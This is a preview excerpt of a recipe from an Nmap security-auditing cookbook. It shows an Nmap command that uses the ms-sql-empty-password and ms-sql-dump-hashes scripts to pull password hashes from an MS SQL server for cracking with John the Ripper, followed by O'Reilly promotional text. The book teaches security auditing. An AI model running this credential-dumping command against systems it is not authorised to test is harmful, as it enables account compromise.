Dumping the password hashes of an MS SQL server

After gaining access to an MS SQL server, we can dump all of the password hashes of an MS SQL server to compromise other accounts. Nmap can help us to retrieve these hashes in a format usable by the cracking tool, John the Ripper.

This recipe shows how to dump crackable password hashes of an MS SQL sever with Nmap.

How to do it...

To dump all the password hashes of an MS SQL server with an empty sysadmin password, run the following Nmap command:

$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>

The password hashes will be included in the ms-sql-dump-hashes script output section:

PORT     STATE SERVICE  VERSION 
1433/tcp open  ms-sql-s Microsoft SQL Server 2011 
Service Info: CPE: cpe:/o:microsoft:windows ...

Get Nmap 6: Network Exploration and Security Auditing Cookbook now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Nmap 6: Network Exploration and Security Auditing Cookbook by Paulino Calderon Pale

Dumping the password hashes of an MS SQL server

How to do it...

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly